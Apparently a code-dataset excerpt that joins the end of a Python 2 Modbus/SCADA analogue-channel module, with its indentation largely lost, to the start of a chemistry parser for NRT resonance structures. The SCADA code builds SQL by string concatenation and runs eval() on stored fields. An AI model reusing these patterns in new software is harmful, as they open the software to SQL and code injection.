# now process raw -> value, by services. x1 x2 y1 y may be different even if the same mba regadd in use. DO NOT calculate status here, happens separately.
Cmd="select val_reg from "+self.in_sql+" where mba<>'' and regadd<>'' group by val_reg" # service list. other
cur.execute(Cmd) # selle paringu alusel raw update, hiljem teha value arvutused iga teenuseliikme jaoks eraldi
for row in cur: # services
status=0 # esialgu, aga selle jaoks vaja iga teenuse jaoks oma tsykkel.
val_reg=row[0] # teenuse nimi
Cmd3="select * from "+self.in_sql+" where val_reg='"+val_reg+"' and mba<>'' and regadd<>'' order by member" # loeme yhe teenuse kogu info
cur3.execute(Cmd3) # another cursor to read the same table
for srow in cur3: # value from raw and also status
#print repr(srow) # debug
mba=-1 #
regadd=-1
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
                    ostatus=0 # previous status
                    #tvalue=0 # test, comparison
                    raw=0
                    ovalue=0 # previous (possibly averaged) value
                    ots=0 # previous ts for value, status and raw
                    avg=0 # averaging factor, takes effect from 2 upwards
desc=''
comment=''
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # "+self.in_sql+"
if srow[0] != '':
mba=int(srow[0]) # must be int! will be -1 if empty (setpoints)
if srow[1] != '':
regadd=int(srow[1]) # must be int! will be -1 if empty
                    val_reg=srow[2] # this is a string
                    if srow[3] != '':
                        member=int(srow[3])
                    if srow[4] != '':
                        cfg=int(srow[4]) # config byte for both individual and group flags at once; show in hex later
if srow[5] != '':
x1=int(srow[5])
if srow[6] != '':
x2=int(srow[6])
if srow[7] != '':
y1=int(srow[7])
if srow[8] != '':
y2=int(srow[8])
#if srow[9] != '':
# outlo=int(srow[9])
#if srow[10] != '':
# outhi=int(srow[10])
if srow[11] != '':
avg=int(srow[11]) # averaging strength, values 0 and 1 do not average!
                    if srow[12] != '': # block - error counter; if it grows above 3, stop sending?
block=int(srow[12]) #
if srow[13] != '': #
raw=int(srow[13])
if srow[14] != '':
ovalue=eval(srow[14]) # ovalue=int(srow[14])
#if srow[15] != '':
# ostatus=int(srow[15])
if srow[16] != '':
ots=eval(srow[16])
#desc=srow[17]
#comment=srow[18]
                    # instead of the following, see pid interpolate
                    msg=val_reg # set here so the print below also works when the config is invalid
                    if x1 != x2 and y1 != y2: # config is sane
                        value=(raw-x1)*(y2-y1)/(x2-x1) # linear transformation
                        value=y1+value
                        #print 'raw',raw,', value',value, # debug
                        if avg>1 and abs(value-ovalue)<value/2: # average, the jump is not large
                            #if avg>1: # readings need averaging; the value could also be kept as a float!
                            value=((avg-1)*ovalue+value)/avg # averaging
                            msg=msg+', averaged '+str(int(value))
                        else: # no averaging for big jumps
                            msg=msg+', nonavg value '+str(int(value))
                    else:
                        print("val_reg",val_reg,"member",member,"ai2scale PARAMETERS INVALID:",x1,x2,'->',y1,y2,'value not used!')
                        value=0
                        status=3 # not to be sent status=3! or send member as NaN?
                    print(msg) # temporarily off; this prints the raw AI reading line
#print 'status for AI val_reg, member',val_reg,member,status,'due to cfg',cfg,'and value',value,'while limits are',outlo,outhi # debug
#"+self.in_sql+" update with new value and sdatus
Cmd="UPDATE "+self.in_sql+" set status='"+str(status)+"', value='"+str(value)+"' where val_reg='"+val_reg+"' and member='"+str(member)+"' and mbi='"+str(mbi)+"'" # meelde
#print Cmd
conn.execute(Cmd)
conn.commit()
#self.conn.commit() # "+self.in_sql+" transaction end
return 0
except:
msg='PROBLEM with '+self.in_sql+' reading or processing: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(0.5)
return 1
def sync_ao(self): # synchronizes AI registers with data in aochannels table
#print('write_aochannels start') # debug
# and use write_register() write modbus registers to get the desired result (all ao channels must be also defined in aichannels table!)
respcode=0
mba=0
omba=0 # previous value
val_reg=''
desc=''
value=0
word=0 # 16 bit register value
#comment=''
mcount=0
cur = conn.cursor()
cur3 = conn.cursor()
ts_created=self.ts # selle loeme teenuse ajamargiks
try:
Cmd="BEGIN IMMEDIATE TRANSACTION"
conn.execute(Cmd)
# 0 1 2 3 4 5 6 7
#mba,regadd,bit,bootvalue,value,rule,desc,comment
Cmd="select aochannels.mba,aochannels.regadd,aochannels.value,aochannels.mbi from aochannels left join aichannels \
on aochannels.mba = aichannels.mba AND aochannels.mbi = aichannels.mbi AND aochannels.regadd = aichannels.regadd \
where aochannels.value != aichannels.value" #
# the command above retrieves mba, regadd and value where values do not match in aichannels and aochannels
#print "Cmd=",Cmd
cur.execute(Cmd)
for row in cur: # got mba, regadd and value for registers that need to be updated / written
                regadd=0
                mba=0
                mbi=0
                if row[0] != '':
                    mba=int(row[0]) # must be a number
                if row[1] != '':
                    regadd=int(row[1]) # must be a number
                if row[2] != '':
                    value=int(float(row[2])) # may contain a decimal point, convert to int!
                if row[3] != '':
                    mbi=int(row[3]) # modbus channel index, used by mb[mbi].write() below
msg='write_aochannels: going to write value '+str(value)+' to register mba.regadd '+str(mba)+'.'+str(regadd)
print(msg) # debug
#syslog(msg)
#client.write_register(address=regadd, value=value, unit=mba)
''' write(self, mba, reg, type = 'h', **kwargs):
:param 'mba': Modbus device address
:param 'reg': Modbus register address
:param 'type': Modbus register type, h = holding, c = coil
:param kwargs['count']: Modbus registers count for multiple register write
:param kwargs['value']: Modbus register value to write
:param kwargs['values']: Modbus registers values array to write
'''
respcode=respcode+mb[mbi].write(mba=mba, reg=regadd,value=value)
conn.commit() # transaction end - why?
return 0
except:
msg='problem with aochannel - aichannel sync!'
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
return 1
# write_aochannels() end. FRESHENED DICHANNELS TABLE VALUES AND CGH BITS (0 TO SEND, 1 TO PROCESS)
def get_aivalue(self,svc,member): # returns raw,value,lo,hi,status values based on service name and member number
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer)
Cmd3="BEGIN IMMEDIATE TRANSACTION" # conn3, et ei saaks muutuda lugemise ajal
conn3.execute(Cmd3)
Cmd3="select value,outlo,outhi,status from "+self.in_sql+" where val_reg='"+svc+"' and member='"+str(member)+"'"
#Cmd3="select raw,value,outlo,outhi,status,mba,regadd,val_reg,member from aichannels where val_reg='"+svc+"' and member='"+str(member)+"'" # debug. raw ei tule?
#print(Cmd3) # debug
cursor3.execute(Cmd3)
raw=0
value=None
outlo=0
outhi=0
status=0
found=0
for row in cursor3: # should be one row only
#print(repr(row)) # debug
found=1
#raw=int(float(row[0])) if row[0] != '' and row[0] != None else 0
value=int(float(row[0])) if row[0] != '' and row[0] != None else 0
outlo=int(float(row[1])) if row[1] != '' and row[1] != None else 0
outhi=int(float(row[2])) if row[2] != '' and row[2] != None else 0
status=int(float(row[3])) if row[3] != '' and row[3] != None else 0
if found == 0:
msg='get_aivalue failure, no member '+str(member)+' for '+svc+' found!'
print(msg)
#syslog(msg)
conn3.commit()
#print('get_aivalue ',svc,member,'value,outlo,outhi,status',value,outlo,outhi,status) # debug
return value,outlo,outhi,status
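    # Usage sketch (added comment; the service name and member number below are
    # made up for illustration):
    #   value, outlo, outhi, status = self.get_aivalue('ABCW', 1)
    # returns the latest scaled value, its limits and the status for that member.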
def set_aivalue(self,svc,member,value): # sets variables like setpoints or limits to be reported within services, based on service name and member number
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer)
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="update aichannels set value='"+str(value)+"' where val_reg='"+svc+"' and member='"+str(member)+"'"
#print(Cmd) # debug
try:
conn.execute(Cmd)
conn.commit()
return 0
except:
msg='set_aivalue failure: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1 # update failure
def set_aovalue(self, value,mba,reg): # sets variables to control, based on physical addresses
#(mba,regadd,bootvalue,value,ts,rule,desc,comment)
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="update aochannels set value='"+str(value)+"' where regadd='"+str(reg)+"' and mba='"+str(mba)+"'"
try:
conn.execute(Cmd)
conn.commit()
return 0
except:
msg='set_aovalue failure: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1 # update failure
def set_aosvc(self,svc,member,value): # to set a readable output channel by the service name and member using dichannels table
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer) # ai
Cmd="BEGIN IMMEDIATE TRANSACTION"
conn.execute(Cmd)
Cmd="select mba,regadd from "+self.in_sql+" where val_reg='"+svc+"' and member='"+str(member)+"'"
cur=conn.cursor()
cur.execute(Cmd)
mba=None
reg=None
for row in cur: # should be one row only
try:
mba=row[0]
reg=row[1]
set_aovalue(value,mba,reg)
conn.commit()
return 0
except:
msg='set_aovalue failed for reg '+str(reg)+': '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1
def make_aichannels(self,svc = ''): # send the ai service messages to the monitoring server (only if fresh enough, not older than 2xappdelay). all or just one svc.
mba=0
val_reg=''
desc=''
cur=conn.cursor()
        ts_created=self.ts # use this as the service timestamp
        try:
            Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3, handling this whole service group (aichannels) is one transaction
conn.execute(Cmd)
if svc == '': # all services
Cmd="select val_reg from "+self.in_sql+" group by val_reg"
else: # just one
Cmd="select val_reg from "+self.in_sql+" where val_reg='"+svc+"'"
cur.execute(Cmd)
for row in cur: # services
                val_reg=row[0] # service name
                sta_reg=val_reg[:-1]+"S" # name without the last character plus S - the status service name, for analogue values and temperatures
if self.make_aichannel_svc(val_reg,sta_reg) == 0: # successful svc insertion into buff2server
pass
#print('tried to report svc',val_reg,sta_reg)
else:
print('make_aichannel FAILED to report svc',val_reg,sta_reg)
return 1 #cancel
conn.commit() # aichannels transaction end
except:
msg='PROBLEM with aichannels reporting '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(0.5)
return 1
def make_aichannel_svc(self,val_reg,sta_reg): #
''' make a single service record (with status chk) based on aichannel members and send it away to UDPchannel '''
status=0 # initially
cur=conn.cursor()
lisa=''
        #print 'reading aichannels values for val_reg',val_reg,'with',mcount,'members' # temporary
        Cmd="select * from "+self.in_sql+" where val_reg='"+val_reg+"'" # re-read all info for one service
        #print Cmd3 # temporary
cur.execute(Cmd) # another cursor to read the same table
mts=0 # max timestamp for svc members. if too old, skip messaging to server
for srow in cur: # service members
#print repr(srow) # debug
mba=-1 #
regadd=-1
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
            ostatus=0 # previous status
            #tvalue=0 # test, comparison
            oraw=0
            ovalue=0 # previous (possibly averaged) value
            ots=0 # previous ts for value, status and raw
            avg=0 # averaging factor, takes effect from 2 upwards
#desc=''
#comment=''
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # aichannels
            mba=int(srow[0]) if srow[0] != '' else 0 # must be int! will be 0 if empty (setpoints)
            regadd=int(srow[1]) if srow[1] != '' else 0 # must be int! will be 0 if empty
            val_reg=srow[2] # this is a string
            member=int(srow[3]) if srow[3] != '' else 0
            cfg=int(srow[4]) if srow[4] != '' else 0 # config byte for both individual and group flags at once; show in hex later
            x1=int(srow[5]) if srow[5] != '' else 0
            x2=int(srow[6]) if srow[6] != '' else 0
            y1=int(srow[7]) if srow[7] != '' else 0
            y2=int(srow[8]) if srow[8] != '' else 0
            outlo=int(srow[9]) if srow[9] != '' else None
            outhi=int(srow[10]) if srow[10] != '' else None
            avg=int(srow[11]) if srow[11] != '' else 0 # averaging strength, values 0 and 1 do not average!
            #block=int(srow[12]) if srow[12] != '' else 0 # error counter; if it grows above 3, stop sending
            oraw=int(srow[13]) if srow[13] != '' else 0
            value=float(srow[14]) if srow[14] != '' else 0 # service member value
            ostatus=int(srow[15]) if srow[15] != '' else 0 # service component status - not used
ots=eval(srow[16]) if srow[16] != '' else 0
#desc=srow[17]
#comment=srow[18]
################ sat
# ai svc STATUS CHK. check the value limits and set the status, according to configuration byte cfg bits values
# use hysteresis to return from non-zero status values
status=0 # initially for each member
if value>outhi: # above hi limit
if (cfg&4) and status == 0: # warning
status=1
if (cfg&8) and status<2: # critical
status=2
if (cfg&12) == 12: # not to be sent
status=3
#block=block+1 # error count incr
else: # return with hysteresis 5%
if value>outlo and value<outhi-0.05*(outhi-outlo): # value must not be below lo limit in order for status to become normal
status=0 # back to normal
# block=0 # reset error counter
if value<outlo: # below lo limit
if (cfg&1) and status == 0: # warning
status=1
if (cfg&2) and status<2: # critical
status=2
if (cfg&3) == 3: # not to be sent, unknown
status=3
#block=block+1 # error count incr
else: # back with hysteresis 5%
if value<outhi and value>outlo+0.05*(outhi-outlo):
status=0 # back to normal
#block=0
#############
#print 'make ai mba ots mts',mba,ots,mts # debug
if mba>0:
if ots>mts:
mts=ots # latest member timestamp for the current service
if lisa != '': # not the first member
lisa=lisa+' ' # separator between member values
lisa=lisa+str(value) # adding member values into one string
# service done
if self.ts-mts < 3*self.readperiod and status<3: # data fresh enough to be sent
sendtuple=[sta_reg,status,val_reg,lisa] # sending service to buffer
# print('ai svc - going to report',sendtuple) # debug
udp.send(sendtuple) # to uniscada instance
else:
msg='skipping ai data send (buff2server wr) due to stale aichannels data, reg '+val_reg+',mts '+str(mts)+', ts '+str(self.ts)
#syslog(msg) # incl syslog
print(msg)
return 1
return 0
def doall(self): # do this regularly, executes only if time is is right
''' Does everything on time if executed regularly '''
self.ts = round(time.time(),1)
if self.ts - self.ts_read > self.readperiod:
self.ts_read = self.ts
self.sync_ai() #
self.sync_ao() # writes output registers to be changed via modbus, based on feedback on di bits
if self.ts - self.ts_send > self.sendperiod:
self.ts_send = self.ts
self.make_aichannels() # compile services and send away
return 0
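# Minimal driver sketch (added comment, not part of the original file; the SQL
# file names and loop setup are assumed to exist elsewhere):
#   ac = Achannels('aichannels.sql', 'aochannels.sql', readperiod=10, sendperiod=30)
#   while True:
#       ac.doall()      # reads AI, syncs AO and reports services when due
#       time.sleep(1)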
|
gpl-3.0
| 2,982,232,896,375,325,000 | 45.240773 | 195 | 0.520505 | false | 3.634618 | false | false | false |
mtthwflst/terse
|
Parsers/NRT.py
|
1
|
24648
|
if __name__ == "__main__":
import sys,os
selfname = sys.argv[0]
full_path = os.path.abspath(selfname)[:]
last_slash = full_path.rfind('/')
dirpath = full_path[:last_slash] + '/..'
print "Append to PYTHONPATH: %s" % (dirpath)
sys.path.append(dirpath)
import copy, string
import math
import numpy
import time,re,logging
from math import sqrt
from Tools import web
from Tools.BetterFile import BetterFile
from Top import Top
from Containers import Topology, AtomicProps
log = logging.getLogger(__name__)
class bondM(Top):
"""
This class represents a resonance structure
"""
def __init__(self, nA, symbols, data, name=''):
self.symbols = symbols
self.data = data
self.name = name
if self.symbols == []:
for i in range(nA):
self.symbols.append("")
if self.data == []:
for i in range(nA):
tmp = []
for j in range(nA):
tmp.append(0)
self.data.append(tmp)
self.wg = 0.0
"""
*
"""
def __getitem__(self,key):
return self.data[key]
"""
*
"""
def __lt__(self, other):
return self.wg < other.wg
"""
*
"""
def __eq__(self, other, CheckSymbols = True):
"""
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
"""
if CheckSymbols:
match = True
for i in range(len(self.symbols)):
if (self.symbols[i] != other.symbols[i]) \
and (self.symbols[i].upper() != 'X') \
and (other.symbols[i].upper() != 'X'):
match = False
break
if not match:
return False
i = 0
for i in range(len(self.data)):
for j in range(len(self.data[i])):
if self.data[i][j] != other.data[i][j]:
return False
return True
"""
*
"""
def __sub__(self,other, CheckSymbols = False):
diff = copy.deepcopy(self)
"""
Subtracts two connectivity matrices
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
:return: a new matrix with difference
:rtype: an object of class bondM
"""
if CheckSymbols and (self.symbols != other.symbols):
return False
for i in range(len(self.data)):
for j in range(len(self.data[i])):
diff[i][j] = self[i][j] - other[i][j]
return diff
"""
*
"""
def __add__(self,other, CheckSymbols = False):
sm = copy.deepcopy(self)
"""
Adds two connectivity matrices
:param CheckSymbols: If selected, additional check for chemical elements symbols matching will be performed
:return: a new matrix with sums
:rtype: an object of class bondM
"""
if CheckSymbols and (self.symbols != other.symbols):
return False
for i in range(len(self.data)):
for j in range(len(self.data[i])):
sm[i][j] = self[i][j] + other[i][j]
return sm
"""
*
"""
def __str__(self):
return self.as_matrix()
"""
*
"""
def as_matrix(self):
"""
:returns: a string with resonance structure in matrix format
:rtype: str
"""
nA = len(self.data)
tStr = " "
for i in range(len(self.data)):
tStr += " % 3s" % (self.symbols[i])
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " % 3i" % (i+1)
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " ---"
tStr += "\n"
for i in range(len(self.data)):
tStr += "%s% 3i | " % (self.symbols[i], i+1)
for b in self.data[i]:
if b == 0:
tStr += " . "
else:
tStr += " %1i " % (b)
tStr += "\n"
return tStr
"""
*
"""
def offDiag(self):
"""
:returns: only off-diagonal elements thus removing information about lone pairs
:rtype: Instance of class bondM
"""
od = copy.deepcopy(self)
for i in range(len(od.data)):
od.data[i][i] = 0
return od
"""
*
"""
def offDiagEQ(self, other):
if self.symbols != other.symbols:
return False
i = 0
for i in range(len(self.data)):
for j in range(len(self.data)):
if i == j:
continue
if self.data[i][j] != other[i][j]:
return False
return True
"""
*
"""
def subset(self, subset):
"""
:param subset: a list of indices of selected atoms
:returns: a submatrix, which is a matrix including only selected atoms
:rtype: instance of class bondM
"""
nA = len(self.data)
# curiously enough, we need to explicitly provide optional empty data, otherwise it will copy the data of the
# current instance!
smallM = bondM(len(subset),symbols = [], data =[])
for i in range(len(subset)):
smallM.symbols[i] = self.symbols[subset[i]-1]
for j in range(len(subset)):
smallM[i][j] = self.data[subset[i]-1][subset[j]-1]
return smallM
"""
*
"""
def as_lines(self,wrap=False):
"""
Return a bond matrix in format compatible with $CHOOSE, $NRTSTR groups
"""
mt = self.data
nA = len(self.data)
s = " STR !"
if self.name:
s += " name="+self.name+','
s+= " weight="+str(self.wg)+','
s+= " symbols="+self.writeSymbols()
s += "\n LONE"
for i in range(nA):
if mt[i][i] > 0:
s = s + " %i %i" % (i+1,mt[i][i])
s = s + " END\n BOND "
counter = 0
for i in range(nA):
for j in range(i+1,nA):
if mt[i][j] == 1:
s = s + " S %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 2:
s = s + " D %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 3:
s = s + " T %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
s = s + " END\n END\n"
return s
"""
*
"""
def as_choose(self,wrap=False):
"""
Return a bond matrix in format compatible with $CHOOSE, $NRTSTR groups
"""
mt = self.data
nA = len(self.data)
s = " LONE"
for i in range(nA):
if mt[i][i] > 0:
s = s + " %i %i" % (i+1,mt[i][i])
s = s + " END\n BOND "
counter = 0
for i in range(nA):
for j in range(i+1,nA):
if mt[i][j] == 1:
s = s + " S %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 2:
s = s + " D %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
if mt[i][j] == 3:
s = s + " T %i %i" % (i+1,j+1)
counter += 1
if wrap and (counter % 10 == 0):
s = s+ "\n "
s = s + " END\n"
return s
"""
*
"""
def applyMatrix(self, matrix, row=0 ,col=0):
"""
Implements elements of a matrix into self. See source for detailed example
"""
"""
A.data = X X X X X, B = Y Y, row=1,col=1 A.data = X X X X X
X X X X X Y Y A.applyMatrix(B,1,1) => X Y Y X X
X X X X X X Y Y X X
X X X X X X X X X X
X X X X X X X X X X
"""
nX = len(matrix)
nY = len(matrix[0])
for i in range(nX):
for j in range(nY):
self.data[row+i][col+j] = matrix[i][j]
"""
*
"""
def applySubset(self, other, subset):
"""
Updates connectivity matrix for atoms in subset with connectivity matrix given in object of class bondM
"""
for i in range(len(subset)):
for j in range(len(subset)):
self.data[subset[i]-1][subset[j]-1] = other.data[i][j]
"""
*
"""
def writeSymbols(self):
"""
converts the list of chemical symbols into string
"""
s = ''
for Symbol in self.symbols:
if s:
s += ' '
if Symbol == '':
s += '-'
else:
s += Symbol
return s
"""
*
"""
def applyStringSymbols(self,s):
"""
converts the a string with chemical symbols into list and applies it to the object
"""
syms = s.split(' ')
for i in range(len(syms)):
if syms[i]=='-':
syms[i]=''
self.symbols = syms
"""
*
"""
def diffColor(self,other):
"""
Compares self and other matrices.
The result is a string representing a difference matrix. The elements that differ are highlighted.
"""
nA = len(self.data)
tStr = " "
for i in range(len(self.data)):
tStr += " % 3s" % (self.symbols[i])
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " % 3i" % (i+1)
tStr += "\n"
tStr += " "
for i in range(len(self.data)):
tStr += " ---"
tStr += "\n"
for i in range(len(self.data)):
tStr += "%s% 3i | " % (self.symbols[i], i+1)
for j in range(len(self.data[i])):
if self.data[i][j] != other[i][j]:
tStr += '\033[1;31m'
if self.data[i][j] == 0:
tStr += " . "
else:
tStr += " %1i " % (self.data[i][j])
if self.data[i][j] != other[i][j]:
tStr += '\033[0;00m'
tStr += "\n"
return tStr
"""
*
"""
def pic(self,filename,picformat='svg'):
"""
Generates a graphical file with 2D-representation of the resonance structure
"""
try:
import openbabel as ob
except:
print "Cannot import openbabel"
return
#ValEl = {'H':1, 'B':3,'C':4,'N':5,'O':6,'F':7,'S':6}
#ValEl = {'1':1, '5':3,'6':4,'7':5,'8':6,'9':7,'16':6}
# Import Element Numbers
ati = []
Sym2Num = ob.OBElementTable()
for a in self.symbols:
ElNum = Sym2Num.GetAtomicNum(a)
ati.append(ElNum)
# Import connections
conn = self.data
mol = ob.OBMol()
# Create atoms
for a in ati:
at = ob.OBAtom()
at.SetAtomicNum(a)
mol.AddAtom(at)
# Create connections
val = []
total_LP = 0
for i in range(len(conn)):
total_LP += conn[i][i]
for i in range(len(conn)):
val.append(conn[i][i] * 2)
for j in range(i):
if conn[i][j]==0:
continue
val[i] += conn[i][j]
val[j] += conn[i][j]
atA = mol.GetAtomById(i)
atB = mol.GetAtomById(j)
b = ob.OBBond()
b.SetBegin(atA)
b.SetEnd(atB)
b.SetBO(int(conn[i][j]))
mol.AddBond(b)
for i in range(len(conn)):
atA = mol.GetAtomById(i)
atAN = atA.GetAtomicNum()
FormValEl = CountValenceEl(atAN)
#if total_LP == 0:
# if atAN == 1:
# FullShell = 2
# else:
# FullShell = 8
# FormCharge = FormValEl + int(val[i]) - FullShell
#else:
FormCharge = int(FormValEl - val[i])
#print "atAN, FormValEl, val[i], FullShell"
#print atAN, FormValEl, val[i], FullShell
#FormCharge = FormCharge % 2
atA.SetFormalCharge(FormCharge)
# Export file
mol.DeleteNonPolarHydrogens()
conv = ob.OBConversion()
conv.SetOutFormat(picformat)
conv.AddOption('C')
conv.WriteFile(mol,filename)
#print val
#c2 = ob.OBConversion()
#c2.SetOutFormat('mol2')
#print c2.WriteString(mol)
def CountValenceEl(x):
"""
Returns a number of valence electrons among the x electrons.
"""
x = int(x)
nmax = int(sqrt(x/2))
val = x
for i in range(nmax+1):
n = 2*i*i
if n < val:
val -= n
return val
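# Added note: CountValenceEl subtracts filled shells of size 2*n^2, e.g.
# CountValenceEl(1) -> 1 (H), CountValenceEl(6) -> 4 (C), CountValenceEl(8) -> 6 (O).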
class NRT(Top):
"""
This class represents a collection of resonance structures.
"""
def __init__(self):
self.FI = None
self.options = ''
self.NBO_version = ''
self.structures = []
self.symbols = []
def parse(self):
if self.FI:
FI = self.FI
else:
FI = BetterFile(self.file)
def read(self, fInp='',fType=''):
if fType=='matrix':
self.read_matrix(fInp)
elif fType=='lines':
self.read_lines(fInp)
elif not self.read_matrix(fInp):
self.read_lines(fInp)
def __str__(self):
return self.as_lines()
def __len__(self):
return len(self.structures)
def __getitem__(self,key):
return self.structures[key]
def write(self,file):
f = open(file,'w')
f.write(str(self))
f.close()
def sortByWg(self):
"""
Sorts resonance structures by weight in descending order
"""
self.structures = sorted(self.structures, key = lambda k: k.wg, reverse = True)
def as_lines(self):
"""
Returns a string with resonance structures written as in the end of .nbout file
"""
s = " $NRTSTR\n"
if self.symbols:
s = s + " !SYMBOLS " + str(self.symbols) + "\n"
for rs in self.structures:
s = s + rs.as_lines()
return s + " $END\n"
"""
*
"""
def totalWg(self):
"""
Returns sum of weights of resonance structures
"""
sm = 0
for mtrx in self.structures:
sm += mtrx.wg
return sm
"""
*
"""
def byName(self,name):
"""
Returns a resonance structure (instance of class bondM) with a given name
"""
for rs in self.structures:
if rs.name == name:
return rs
"""
*
"""
def patternsOfSubset(self,subset,OffDiag = False):
"""
Returns connectivity patterns for a given subset of atoms.
Weights of these patterns are calculated.
"""
Patterns = SetOfResStr()
for i_mtrx in range(len(self.structures)):
mtrx = self.structures[i_mtrx]
if OffDiag:
currMat = mtrx.subset(subset).offDiag()
else:
currMat = mtrx.subset(subset)
if currMat in Patterns.structures:
i = Patterns.structures.index(currMat)
Patterns.structures[i].wg += mtrx.wg
Patterns.structures[i].indices.append(i_mtrx)
else:
Patterns.structures.append(currMat)
Patterns.structures[-1].wg = mtrx.wg
Patterns.structures[-1].indices = [i_mtrx,]
"""
for mtrx in self.structures:
if OffDiag:
currMat = mtrx.subset(subset).offDiag()
else:
currMat = mtrx.subset(subset)
if currMat in Patterns.structures:
i = Patterns.structures.index(currMat)
Patterns.structures[i].wg += mtrx.wg
else:
Patterns.structures.append(currMat)
Patterns.structures[-1].wg = mtrx.wg
"""
return Patterns
"""
*
"""
def getWeights(self,NBO_RS):
"""
Updates weights of reference structures, if they are found in NBO_RS
:param NBO_RS: an object of class SetOfResStr, where resonance structures will be looked for.
"""
for mtrx in self.structures:
mtrx.wg = 0
if mtrx in NBO_RS.structures:
iPat = NBO_RS.structures.index(mtrx)
mtrx.wg = NBO_RS.structures[iPat].wg
mtrx.indices = NBO_RS.structures[iPat].indices
"""
*
"""
def offDiag(self):
"""
Returns an instance of SetOfResStr class with zeroed diagonal elements of resonance structure matrices
(in other words, with lone pairs removed)
"""
od = copy.deepcopy(self)
for i in range(len(self.structures)):
od.structures[i] = self.structures[i].offDiag()
return od
"""
*
"""
def read_matrix(self,fInp = ''):
"""
Reading the resonance structs. This can handle split TOPO matrices determine the number of atoms
"""
if fInp:
try:
inp = open(fInp,'r')
except:
print '[Warning]: cannot open %s' % (fInp)
return
else:
inp = sys.stdin
s = inp.readline()
while s:
if "Atom distance matrix:" in s:
break
s = inp.readline()
inp.readline()
inp.readline()
inp.readline()
nAtoms = 0
s = inp.readline()
while s:
# atom numbers go like "1." so they must convert into a float, if not then we are done
try:
float(s.split()[0])
except:
break
nAtoms += 1
s = inp.readline()
# read the main structure
main = bondM(nAtoms,[],[])
s = inp.readline()
while s:
if "TOPO matrix for" in s:
break
s = inp.readline()
inp.readline()
atomsPerLine = len(inp.readline().split()) -1
nPasses = int(math.ceil(float(nAtoms)/atomsPerLine))
inp.readline()
for aPass in range(nPasses):
for i in range(nAtoms):
L = inp.readline().split()
main.symbols[i]=L[1]
for j in range(len(L)-2):
main[i][aPass*atomsPerLine+j] = int(L[j+2])
if aPass < nPasses - 1:
inp.readline()
inp.readline()
inp.readline()
s = inp.readline()
while s:
if "---------------------------" in s:
break
s = inp.readline()
# here comes the parsing of the other structs
# the main first , just the %
line = inp.readline()
try:
main.wg = float(line[10:17])
except:
return False
struct_lns = []
line = inp.readline()
while line:
if "---------------------------" in line:
break
if line[4] == " ":
struct_lns[-1] += line.strip("\n")[18:]
else:
struct_lns.append(line.strip("\n"))
line = inp.readline()
allStructs = []
allStructs.append(main)
for tStr in struct_lns:
tmpM = copy.deepcopy(main)
tmpM.wg = float(tStr[10:17])
#print tStr
dontInclude = False
for mod in tStr[18:].split(','):
mod = mod.strip()
if len(mod.split()) == 0:
dontInclude = True
break
increment = 0
if mod[0] == "(":
increment -= 1
aList = mod.strip("()").split("-")
else:
increment += 1
aList = mod.split("-")
aL2 = []
for aL in aList:
aL2.append(int(aL.strip(string.letters+" "))-1)
if len(aL2) == 2:
tmpM[aL2[0]][aL2[1]] += increment
tmpM[aL2[1]][aL2[0]] += increment
elif len(aL2) == 1:
tmpM[aL2[0]][aL2[0]] += increment
if not dontInclude:
allStructs.append(tmpM)
self.structures = allStructs
if allStructs:
return True
else:
return False
#
        # Done reading the resonance structs.
#
"""
*
"""
def read_lines(self,fInp=''):
"""
Reads NRT strings given in the format of $NRTSTR, $CHOOSE groups
"""
allStructs = []
if fInp:
inp = open(fInp,'r')
else:
inp = sys.stdin
BondTypes = {'S':1,'D':2,'T':3}
NAtoms = 0
inside = False
while True:
s = inp.readline().strip('\n')
if not s:
break
if "$END" in s:
continue
if "STR" in s:
inside = True
LP, Bonds, props = {}, {}, {}
if "!" in s:
all_params = s.split('!')[1]
for param in all_params.split(','):
name_value = param.split('=')
if len(name_value)>1:
props[name_value[0].strip()] = name_value[1].strip()
continue
if inside and "LONE" in s:
tmp = s.split()
for i in range(1,len(tmp)-1,2):
LP[tmp[i]] = tmp[i+1]
NAtoms = max(NAtoms,int(tmp[i]))
#print "Lone Pairs:\n",LP
continue
if inside and "BOND" in s:
tmp = s.split()
for i in range(1,len(tmp)-1,3):
